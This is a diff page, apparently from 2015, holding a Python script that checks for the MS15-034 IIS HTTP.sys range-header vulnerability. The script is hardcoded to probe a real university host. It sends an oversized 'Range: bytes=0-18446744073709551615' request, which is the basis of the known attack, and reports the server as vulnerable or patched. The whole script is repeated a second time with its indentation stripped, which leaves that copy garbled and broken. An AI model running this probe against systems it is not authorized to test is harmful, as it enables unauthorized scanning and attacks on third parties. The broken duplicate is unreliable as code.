davexpro · April 15, 2015 10:14
diff --git a/MS15-034.py b/MS15-034.py
 '''
 ___.                                   .___ __                         __   
 \_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_ 
 | __ \_/ __ <   |  |/  _ \ /    \  / __ |\   __\_  __ \  |  \/  ___/\   __\
 | \_\ \  ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \  |  |  
 |___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|  
     \/     \/\/                \/      \/                        \/        
                                                            MS15-034 Checker

 Danger! This script has not been properly qa'd and will probably fail in terrible ways.
 It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
 result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
 an HTTP range request.
 -BF


 8a8b2112 56              push    esi
 8a8b2113 6a00            push    0
 8a8b2115 2bc7            sub     eax,edi
 8a8b2117 6a01            push    1
 8a8b2119 1bca            sbb     ecx,edx
 8a8b211b 51              push    ecx
 8a8b211c 50              push    eax
 8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

 '''
 import socket
 import random

 ipAddr = "credit.stu.edu.cn"
 hexAllFfff = "18446744073709551615"

 req1 = "GET / HTTP/1.0\r\n\r\n"
 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

 print "[*] Audit Started"
 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 client_socket.connect((ipAddr, 80))
 client_socket.send(req1)
 boringResp = client_socket.recv(1024)
 if "Microsoft" not in boringResp:
                print "[*] Not IIS"
                exit(0)
 client_socket.close()
 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 client_socket.connect((ipAddr, 80))
 client_socket.send(req)
 goodResp = client_socket.recv(1024)
 if "Requested Range Not Satisfiable" in goodResp:
                print "[!!] Looks VULN"
 elif " The request has an invalid header name" in goodResp:
                print "[*] Looks Patched"
 else:
                print "[*] Unexpected response, cannot discern patch status"
	'''
	___. .___ __ __
	\_ \|__ ____ ___.__. ____ ____ __\| _// \|________ __ __ _______/ \|_
	\| __ \_/ __ < \| \|/ _ \ / \ / __ \|\ __\_ __ \ \| \/ ___/\ __\
	\| \_\ \ ___/\___ ( <_> ) \| \/ /_/ \| \| \| \| \| \/ \| /\___ \ \| \|
	\|___ /\___ > ____\|\____/\|___\| /\____ \| \|__\| \|__\| \|____//____ > \|__\|
	\/ \/\/ \/ \/ \/
	MS15-034 Checker

	Danger! This script has not been properly qa'd and will probably fail in terrible ways.
	It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
	result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
	an HTTP range request.
	-BF


	8a8b2112 56 push esi
	8a8b2113 6a00 push 0
	8a8b2115 2bc7 sub eax,edi
	8a8b2117 6a01 push 1
	8a8b2119 1bca sbb ecx,edx
	8a8b211b 51 push ecx
	8a8b211c 50 push eax
	8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here

	'''
	import socket
	import random

	ipAddr = "credit.stu.edu.cn"
	hexAllFfff = "18446744073709551615"

	req1 = "GET / HTTP/1.0\r\n\r\n"
	req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

	print "[*] Audit Started"
	client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	client_socket.connect((ipAddr, 80))
	client_socket.send(req1)
	boringResp = client_socket.recv(1024)
	if "Microsoft" not in boringResp:
	print "[*] Not IIS"
	exit(0)
	client_socket.close()
	client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	client_socket.connect((ipAddr, 80))
	client_socket.send(req)
	goodResp = client_socket.recv(1024)
	if "Requested Range Not Satisfiable" in goodResp:
	print "[!!] Looks VULN"
	elif " The request has an invalid header name" in goodResp:
	print "[*] Looks Patched"
	else:
	print "[*] Unexpected response, cannot discern patch status"